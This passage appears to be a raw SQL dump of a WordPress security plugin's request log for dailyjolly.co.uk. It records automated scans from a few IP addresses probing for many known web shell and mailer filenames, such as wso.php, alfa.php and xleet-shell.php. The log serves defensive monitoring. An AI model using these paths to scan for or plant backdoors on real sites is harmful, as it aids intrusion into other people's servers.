0),('20.14.84.163',336483491,'',0,1674118965.1753,55,'CdXatTIP7oy8h9MBuKNREf3Q','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674118966.1791,55,'wm1vRUBshlF8TNt4fjQSx92W','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/lf.php',0,19,0),('20.14.84.163',336483491,'',0,1674118967.1511,55,'K5BwJYmhebyEaNGQA6DU9C8g','','19|0|0|0|www.dailyjolly.co.uk/.tmb/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674118968.0781,55,'qck6eZaw94NbHCyPdYgm0LI3','','19|0|0|0|www.dailyjolly.co.uk/mailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674118969.0371,55,'iOoZ5zdA3ElbcsBVgfnxS9kh','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('20.14.84.163',336483491,'',0,1674118969.9976,55,'7kx1mRB5SZQdoPs60qcWIw4G','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('20.14.84.163',336483491,'',0,1674118970.9452,55,'yquZaIsRYFf0n2gpJDWNtMAh','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('20.14.84.163',336483491,'',0,1674118971.8704,55,'yIJ3MWuisNxjOAYl8P95t0rT','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.14.84.163',336483491,'',0,1674118972.8283,55,'PyQLMcV6W9RszHFEu17JOBxC','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.14.84.163',336483491,'',0,1674118973.8351,55,'nfHG937Ve2qKRtY5rPxbEkNg','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('20.14.84.163',336483491,'',0,1674118974.8006,55,'KALMRU4YoXSarg2BmDZyNkd8','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.14.84.163',336483491,'',0,1674118975.7316,55,'5ROaviWlLJQm4tNeYDwk7AfF','','19|0|0|0|www.dailyjolly.co.uk/28.php',0,19,0),('20.14.84.163',336483491,'',0,1674118976.6493,55,'VWxgSGQowh6OdYF4cTIuJRHM','','19|0|0|0|www.dailyjolly.co.uk/.Wp-maiiler.phP',0,19,0),('20.14.84.163',336483491,'',0,1674118977.6033,55,'3Va7Q9YrUn1cWuqEgCRyoINA','','19|0|0|0|www.dailyjolly.co.uk/owl.php',0,19,0),('20.14.84.163',336483491,'',0,1674118978.5463,55,'OqXCl7fb6V9t8AP2cu4YBL30','','19|0|0|0|www.dailyjolly.co.uk/wp-content/owl.php',0,19,0),('20.14.84.163',336483491,'',0,1674118979.4832,55,'y17wc8ZomQSHbhPldR59eOWK','','19|0|0|0|www.dailyjolly.co.uk/wp-maiiler.php',0,19,0),('20.14.84.163',336483491,'',0,1674118980.5976,55,'ZjepbNXviYK7QrmfxAzkusR5','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('20.14.84.163',336483491,'',0,1674118981.5578,55,'0zdt68N4sJXpHfenaBhCwLmP','','19|0|0|0|www.dailyjolly.co.uk/.Wp-maiiler.phP',0,19,0),('20.14.84.163',336483491,'',0,1674118982.5024,55,'LnzRcQ0p6NDE9hCBVfgIjS53','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('168.100.162.235',2825167595,'',0,1674119390.5336,55,'Dbwx8YHrlyg0G7MEV4ORhUaf','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('35.183.107.9',599223049,'',0,1674121589.7254,55,'IaLt1coVlpvHA5Yk8yKq4gXE','','19|0|0|0|dailyjolly.co.uk/shx.php',0,19,0),('35.183.107.9',599223049,'',0,1674121593.8374,55,'pTgCyXUPFk7qGL1sai9jSWJE','','19|0|0|0|dailyjolly.co.uk/shx.php',0,19,0),('35.183.107.9',599223049,'',0,1674121633.9740,55,'g4UxYl5AdOaBEPQnMR0Xhjze','','19|0|0|0|dailyjolly.co.uk/small.php',0,19,0),('35.183.107.9',599223049,'',0,1674121633.9882,55,'4RUT0G7xSzBPCumydkKalhg5','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('35.183.107.9',599223049,'',0,1674121633.9936,55,'iZd2j1SybcHkeMIg4aNuTrYU','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('35.183.107.9',599223049,'',0,1674121634.0172,10,'g4UxYl5AdOaBEPQnMR0Xhjze','','707|0|0|0|dailyjolly.co.uk/small.php',0,707,0),('35.183.107.9',599223049,'',0,1674121634.0527,55,'mIeo0QujAdrB3D8k7VHcbLCz','','19|0|0|0|dailyjolly.co.uk/wp-class.php',0,19,0),('35.183.107.9',599223049,'',0,1674121634.0829,55,'6igs8Ujd7wKJ4VQRoPEMOZqz','','19|0|0|0|dailyjolly.co.uk/ne.php',0,19,0),('35.183.107.9',599223049,'',0,1674121634.0971,55,'5DPyHs0JmSLhOYx29eXzfBF6','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('35.183.107.9',599223049,'',0,1674121634.3174,55,'NImTG6A7rFMHjUgbnXRvpesQ','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('35.183.107.9',599223049,'',0,1674121634.4906,55,'uVaLXM4QOyWbBsAC1NfoGwSH','','19|0|0|0|dailyjolly.co.uk/wp-includes/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121635.0050,100,'qRbafQdvmuzn4eytVAX57g1P','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,13,0),('35.183.107.9',599223049,'',0,1674121635.8850,55,'zKqa5wJITEvcnF0COBfGPjVA','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('35.183.107.9',599223049,'',0,1674121635.9936,55,'8fUIV01pgiNwxLGuEnkC3Rlh','','19|0|0|0|dailyjolly.co.uk/ne.php',0,19,0),('35.183.107.9',599223049,'',0,1674121636.4885,55,'d1zW8x5UZKlSvVEh2HP6tsDj','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('35.183.107.9',599223049,'',0,1674121636.6376,55,'pRA4jQeOUoNyfSaI31Htszbv','','19|0|0|0|dailyjolly.co.uk/wp-class.php',0,19,0),('35.183.107.9',599223049,'',0,1674121637.8006,55,'7HjvRNBsEoe3SMuiYIphK5Qq','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('35.183.107.9',599223049,'',0,1674121638.4877,55,'jrAhgkbaqQePfvG9m1ELJdwt','','19|0|0|0|dailyjolly.co.uk/wp-includes/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121638.9894,55,'jxBh0lVSyI4J9sewnHC5Qif8','','19|0|0|0|dailyjolly.co.uk/small.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.0022,55,'OcnJsXlkvoKdB7tF1VbTfaxj','','19|0|0|0|dailyjolly.co.uk/0z.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.0182,55,'yaUp5X7cgBFrEqRI8zH2jAws','','19|0|0|0|dailyjolly.co.uk/fox.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.1353,55,'M9RphSADuKcjfsmPtQiFNHek','','19|0|0|0|dailyjolly.co.uk/blog.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.2377,55,'oMf6Y7aWOyQZPLe9qiDhUAtr','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.3310,55,'RKxzoIOYB8Ge0yq4tpSdnvVU','','19|0|0|0|dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.4494,100,'ZHFwyNpi9KBdORmCJW72jSqA','','13|0|0|0|dailyjolly.co.uk/ff.php',0,13,0),('35.183.107.9',599223049,'',0,1674121646.4506,55,'a0gA3ivDn8W2CG7SQ4TYq6sr','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.4946,55,'zguQ5HNM1eBUbaJrFDlAOhtv','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.5526,55,'KjMIOk1a5z8sLF24XBt3Eyif','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.5575,55,'gWJuybiBQ6Tm8rsIUzPtvSpV','','19|0|0|0|dailyjolly.co.uk/wp-admin/x.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.5932,55,'vmnbV2DHyNcjiKslzY9IRaWM','','19|0|0|0|dailyjolly.co.uk/.cgi/cache/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.6027,55,'IiD5NM48PZFeR1Tf6JOylnWH','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.6253,55,'DmAUEirdOuVtaWP2sekTHn9Y','','19|0|0|0|dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.6725,55,'8QRr4I9Hj7LwlAkUcxYOJqBF','','19|0|0|0|dailyjolly.co.uk/indeeex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.7140,55,'bai9LA42nQdS0HlOreEx7k3P','','19|0|0|0|dailyjolly.co.uk/xindex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.7356,55,'drFm2quMAfaTiOJoCUvjGVSz','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.8028,55,'JHKfYv4qbO9S1ihEeRuLV78T','','19|0|0|0|dailyjolly.co.uk/wp-includes/991176.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.8477,55,'HYLCpoQx6J49FWjEuRtKMrAX','','19|0|0|0|dailyjolly.co.uk/wso1.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.8857,100,'Y5kJ36mtZRNXVwxHG27MiyUE','','13|0|0|0|dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('35.183.107.9',599223049,'',0,1674121646.9506,55,'RH2NrXzpsSL9GJTZQvOVqjYP','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('35.183.107.9',599223049,'',0,1674121646.9689,55,'PbLRXglVQ4pH02rxvzNqwe7K','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.0298,55,'x4E1TMdqvIaQFpGwC7OSVWLk','','19|0|0|0|dailyjolly.co.uk/hello.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.1025,55,'oNHrEyx9eWSMOgJf8AZ5Ljah','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.1237,55,'RrpANKX7li3V1WQh0YkCOSay','','19|0|0|0|dailyjolly.co.uk/wp-includes/IXR/hunt.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.1593,100,'tXBsQqFbm0g2A7fpZUlwvjWn','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,13,0),('35.183.107.9',599223049,'',0,1674121647.1701,55,'QIjLpUS1oDydlROPiYM950u4','','19|0|0|0|dailyjolly.co.uk/defau1t.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.1716,55,'MpAjsoGEOl8NLxFC0evbUtq9','','19|0|0|0|dailyjolly.co.uk/1975.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.2437,55,'hRbxz9BUE5ecAX0uLPYyM6fg','','19|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.2497,55,'kuzUoiamGvnZOgWFE37xwSJ4','','19|0|0|0|dailyjolly.co.uk/images/vuln.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.2987,55,'OEPfGKMzCTisype6IXdZl2bq','','19|0|0|0|dailyjolly.co.uk/wp-blog.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.4346,55,'VxCARuojPEfWbtp6OQFH1Tc5','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.4778,55,'LMqiWEgT9Km0e4aCcRpvZ61f','','19|0|0|0|dailyjolly.co.uk/stindex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.6204,55,'yVGbnUEA0mXl2pfQvFKzLDCg','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.7139,55,'oaOEHLKBdfUrixw05ysQpA1F','','19|0|0|0|dailyjolly.co.uk/8.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.7313,55,'kv3US0IGpwMnE9AgXmaPhWz8','','19|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.7407,55,'Wm6OvdhPy9xLU8NsjutcQRBH','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.7586,55,'q7TnkJZDgIBObRWNMLvKprUE','','19|0|0|0|dailyjolly.co.uk/b.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.8904,55,'3wBPLtgaAlO2kT9ihNCeZnpx','','19|0|0|0|dailyjolly.co.uk/jindex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121647.9043,55,'TPo2Az8XtRawBWYIyGrmxJZ4','','19|0|0|0|dailyjolly.co.uk/0.php',0,19,0),('35.183.107.9',599223049,'',0,1674121655.3813,55,'YgDrF7Vn63hjCElbB5xuXA0L','','19|0|0|0|dailyjolly.co.uk/0z.php',0,19,0),('35.183.107.9',599223049,'',0,1674121655.4068,55,'tFEazQu4U7qcfrZLbCO1oNhR','','19|0|0|0|dailyjolly.co.uk/fox.php',0,19,0),('35.183.107.9',599223049,'',0,1674121655.5720,55,'hrNCGtJTWKMaqimAbex0LzPo','','19|0|0|0|dailyjolly.co.uk/blog.php',0,19,0),('35.183.107.9',599223049,'',0,1674121655.6529,55,'pmOGEkHJYPZ1aw3qC5SW0oK9','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('35.183.107.9',599223049,'',0,1674121655.7790,55,'bg3f2V41c6OALUHYZurRXvIz','','19|0|0|0|dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121656.6993,100,'ICcdFxLrfDiTQsROp0SNBe6u','','13|0|0|0|dailyjolly.co.uk/ff.php',0,13,0),('35.183.107.9',599223049,'',0,1674121657.2132,55,'PxyrnQMlSeC43iRK6OmNJAIG','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('35.183.107.9',599223049,'',0,1674121657.9190,55,'kRe5ATINE26YBHhOG9UCvK70','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('35.183.107.9',599223049,'',0,1674121659.7807,55,'wNXO69RMiPZGu8Ak3o7pz5FH','','19|0|0|0|dailyjolly.co.uk/.cgi/cache/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121660.2780,55,'y9naeT8Y4KwhNgpfimxGZ2MR','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('35.183.107.9',599223049,'',0,1674121660.2937,55,'mQIRjSLOxshZMqf0FvTVo8ey','','19|0|0|0|dailyjolly.co.uk/indeeex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121660.3037,55,'09ot5fwdvghFzq7sLPxSiJmZ','','19|0|0|0|dailyjolly.co.uk/wp-admin/x.php',0,19,0),('35.183.107.9',599223049,'',0,1674121660.7320,55,'FELx86pDmbta2ohSNKve5Tn3','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('35.183.107.9',599223049,'',0,1674121660.9099,55,'Nsr0ZxlD1MWLUB3uAJ4kTKF7','','19|0|0|0|dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121661.1117,55,'7GbPrkpYCSZRaBiXIfuwHz6E','','19|0|0|0|dailyjolly.co.uk/xindex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121661.2040,55,'nT8l5MDSGtRP7WY6ZjB4NgcH','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('35.183.107.9',599223049,'',0,1674121661.6369,55,'07FwoTmQi6MBnyWRs9ELdhUj','','19|0|0|0|dailyjolly.co.uk/wp-includes/991176.php',0,19,0),('35.183.107.9',599223049,'',0,1674121661.9786,55,'zBSepfrK2wyTj4sUDRkCWmnA','','19|0|0|0|dailyjolly.co.uk/wso1.php',0,19,0),('35.183.107.9',599223049,'',0,1674121662.7331,100,'gm07oSj1MQZcRXvGfNl2aDJ3','','13|0|0|0|dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('35.183.107.9',599223049,'',0,1674121663.1949,55,'hPqZFvnsr9mtIgBUN1eKMiD0','','19|0|0|0|dailyjolly.co.uk/hello.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.2448,100,'vlMpIfQiwCqsTJ6zauZryWE5','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,13,0),('35.183.107.9',599223049,'',0,1674121663.3744,55,'8I6XxmfQp0ZsB7CaqreV3ndc','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.4381,55,'l9w4gaeqKhsjREZYOu1MImfn','','19|0|0|0|dailyjolly.co.uk/wp-blog.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.5790,55,'bGPQhLKS4CARma30VykjpxvJ','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.7360,55,'QVW3UzF5NTCIhs6BvYL7m8rE','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.7739,55,'NKacDI1gyfZrzd3njFutHs0P','','19|0|0|0|dailyjolly.co.uk/1975.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.9089,55,'4wjU13pnNYltgxyVfT9L6FQJ','','19|0|0|0|dailyjolly.co.uk/8.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.9237,55,'JtnKCEUhg4Pkv78Dc5N3ZXzd','','19|0|0|0|dailyjolly.co.uk/jindex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.9541,55,'j7yAEB5ZfpMRm0rnuwHXcOWK','','19|0|0|0|dailyjolly.co.uk/defau1t.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.9586,55,'EeNmcJ4VIoRlptqgbOawT0KL','','19|0|0|0|dailyjolly.co.uk/stindex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121663.9751,55,'0kZCY2Fw37XJdf6QsD1Bl8eM','','19|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674121664.0685,55,'eH0Cyocnh1qKSk6dYzRUl9mE','','19|0|0|0|dailyjolly.co.uk/0.php',0,19,0),('35.183.107.9',599223049,'',0,1674121664.1257,55,'PNlR18Z3qQSnjes6b9OUFYho','','19|0|0|0|dailyjolly.co.uk/b.php',0,19,0),('35.183.107.9',599223049,'',0,1674121664.2167,55,'tTM92nHagIsJfDhCoFPy6Llj','','19|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('35.183.107.9',599223049,'',0,1674121664.4124,55,'PIxsBvrLmH4GQNutkf1FCp5h','','19|0|0|0|dailyjolly.co.uk/wp-includes/IXR/hunt.php',0,19,0),('35.183.107.9',599223049,'',0,1674121664.4354,55,'LudKRjtpeYT8BlXFgCZy5MQG','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121664.6701,55,'HK8F7fv1ARQJZ5n92GuxzON4','','19|0|0|0|dailyjolly.co.uk/images/vuln.php',0,19,0),('35.183.107.9',599223049,'',0,1674121665.0376,55,'S7vXMIT5cGNdzqhjOkQogD0F','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('35.183.107.9',599223049,'',0,1674121665.4640,55,'ijt3w1yRFugNIBHJevYZpVac','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('35.183.107.9',599223049,'',0,1674121681.4682,55,'0PvqeElwLau5NZQxh79pRTAF','','19|0|0|0|dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674121681.8711,55,'QeFM7ifa52dlEDvKR9H1A3Nb','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('35.183.107.9',599223049,'',0,1674121681.9948,55,'X2iQzSpFsgV6m0JjUPM5CLNW','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.0501,55,'mdqhjDNftbE5MgKxc2okCGQa','','19|0|0|0|dailyjolly.co.uk/u.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.0820,55,'jXM7FrRd4KSeL0Q6AWpzY1Df','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/fighter/fk.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.1101,55,'6ByqOneZlpIzC2ftKbU085TV','','19|0|0|0|dailyjolly.co.uk/s.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.3230,55,'Ne29LfoJa7MHrySiTvt5KkGp','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp-atom.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.4179,100,'eSf2qhp9u1ZHjdPOLN5bm6Bk','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('35.183.107.9',599223049,'',0,1674121682.4263,55,'kthLiWU4HoeI2BlCJxm8nYNK','','19|0|0|0|dailyjolly.co.uk/new-index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.5549,55,'iNva3VXnIsohBzcELQ1Dj7uw','','19|0|0|0|dailyjolly.co.uk/wp-wso.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.6980,55,'PY9UMBlIsLynrVZ3XuJ1oWtf','','19|0|0|0|dailyjolly.co.uk/wp-content/wso.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.7457,55,'n9lRQ41bcpv05mrwNX2J7fWD','','19|0|0|0|dailyjolly.co.uk/wp-admin/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.9506,55,'nFDRkJCBrjuLEgyMPeibQtIh','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('35.183.107.9',599223049,'',0,1674121682.9806,55,'na1C5fGNsTeb8xWiDZUu2vQY','','19|0|0|0|dailyjolly.co.uk/ups.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.1449,55,'IED05diZf7lRncavqjL3OTJz','','19|0|0|0|dailyjolly.co.uk/wp-content/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.1635,55,'tjlIyoO8ZXaBbH1YR6GSDmhz','','19|0|0|0|dailyjolly.co.uk/wp.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.2193,55,'ARuHjE0MgO9C4FlPGSnbiQBw','','19|0|0|0|dailyjolly.co.uk/wso112233.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.2197,55,'NUmCJtp13Aqx0YfuPHV5BSDl','','19|0|0|0|dailyjolly.co.uk/w.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.2573,55,'l86rJyDLYvVcKPhIfFsNgtmo','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.2580,55,'5ARENUXrOjiY1gPZfoK0L3Jl','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.2594,55,'YDHhm5LpO3KfSNlVZJ1kAzur','','19|0|0|0|dailyjolly.co.uk/2.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.3015,55,'kL8HPlvcZ9eS02tINwBGxioh','','19|0|0|0|dailyjolly.co.uk/mt/pekok.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.3549,55,'PQJZVAxMLB9kp24u3SbIsNfG','','19|0|0|0|dailyjolly.co.uk/xleet-shell.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.3551,55,'PaBiyAYM6jOdVsD9JClwtIb5','','19|0|0|0|dailyjolly.co.uk/y.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.4820,55,'5PGfaBhXR0dNx6DMzZkenSWt','','19|0|0|0|dailyjolly.co.uk/xx.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.4906,55,'lqEASTxjYangopNDLkXiMRKe','','19|0|0|0|dailyjolly.co.uk/xmlrpcs.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.4906,55,'8174BmRvjuEAMgsrtiYxIVwP','','19|0|0|0|dailyjolly.co.uk/p.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.5267,55,'KkhwgcXTQDIB2q5iraSfJnRz','','19|0|0|0|dailyjolly.co.uk/vuln.php',0,19,0),('35.183.107.9',599223049,'',0,1674121683.5579,55,'2HRM105BnziNhpmgxoka7Dre','','19|0|0|0|dailyjolly.co.uk/5.php',0,19,0),('35.183.107.9',599223049,'',0,1674121684.0448,55,'VMlRJefspoLwTbCaO10tmu2i','','19|0|0|0|dailyjolly.co.uk/h.php',0,19,0),('35.183.107.9',599223049,'',0,1674121684.5137,55,'Z9eyrJnIPlSpxago6AiCFDEB','','19|0|0|0|dailyjolly.co.uk/i.php',0,19,0),('35.183.107.9',599223049,'',0,1674121684.5233,55,'ki2sNBtMfQ5XqUrDIL4dcvxo','','19|0|0|0|dailyjolly.co.uk/r.php',0,19,0),('35.183.107.9',599223049,'',0,1674121684.6571,55,'nlQSqXz48dYPgpIsHMtCUh6A','','19|0|0|0|dailyjolly.co.uk/l.php',0,19,0),('35.183.107.9',599223049,'',0,1674121684.7812,50,'yTuMpdkPSoUYcEtKZHD9JqaL','','13|0|0|0|dailyjolly.co.uk/wp-load.php',0,13,0),('35.183.107.9',599223049,'',0,1674121684.8606,55,'bmCipzZstKQLgV4RIuEv28kJ','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.0238,55,'jDH0Z83EOeYnRs7fpQVc2rXI','','19|0|0|0|dailyjolly.co.uk/xleet.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.0596,55,'lJXaB1yumhEMLoftiNIzx4dr','','19|0|0|0|dailyjolly.co.uk/xltavrat.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.1018,55,'NkWBr0TjQXJiH4uzPsxf7vlS','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.2640,55,'5Rn08OlM9JviKHYwDZ43tqSX','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.3247,55,'CHIZgncQr2GBNyshOLETbFm3','','19|0|0|0|dailyjolly.co.uk/fx.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.3809,55,'djIJ2tZsfXSFia0ORc3hm1eC','','19|0|0|0|dailyjolly.co.uk/wp-content/wp.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.4385,55,'w3CbHdtSJgmq7D5hAIYO1Ni6','','19|0|0|0|dailyjolly.co.uk/e.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.5027,55,'jHtLGuiOCUm9Vhr0qdDl58f6','','19|0|0|0|dailyjolly.co.uk/site/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.5784,55,'jkQhxuRdcMULvtAbI7mPX6se','','19|0|0|0|dailyjolly.co.uk/blog/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.6292,55,'i6BFtEkKsbNnHP8WaLvzeghO','','19|0|0|0|dailyjolly.co.uk/old-index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.6737,55,'x1Rpv6tDMzdZWCg0ObLFyGjm','','19|0|0|0|dailyjolly.co.uk/export.php',0,19,0),('35.183.107.9',599223049,'',0,1674121685.9365,55,'nMNjmlqYRvB3iGbeUQLCf4dJ','','19|0|0|0|dailyjolly.co.uk/Uploader.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.0347,55,'kJ8c6Av4gTurRadYPyUiCfB3','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.0839,55,'5GFXACrfklHRT2voOYEmpWNq','','19|0|0|0|dailyjolly.co.uk/swm.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.2814,55,'KF2z4JaS8mfZvTpXIqWHjYhP','','19|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.2934,55,'QHuAUVBKqdW3ah9LDTEtcPFx','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/xm.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.5465,55,'WqYhCVa9TeD0ljBZu6HmfyKM','','19|0|0|0|dailyjolly.co.uk/ws.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.5486,55,'2jd8Y0ze7xLh4uo1lZmXKbip','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.5486,55,'YPMWCwGhB13HXefTrl8OJNmZ','','19|0|0|0|dailyjolly.co.uk/ok.php',0,19,0),('35.183.107.9',599223049,'',0,1674121686.9235,55,'0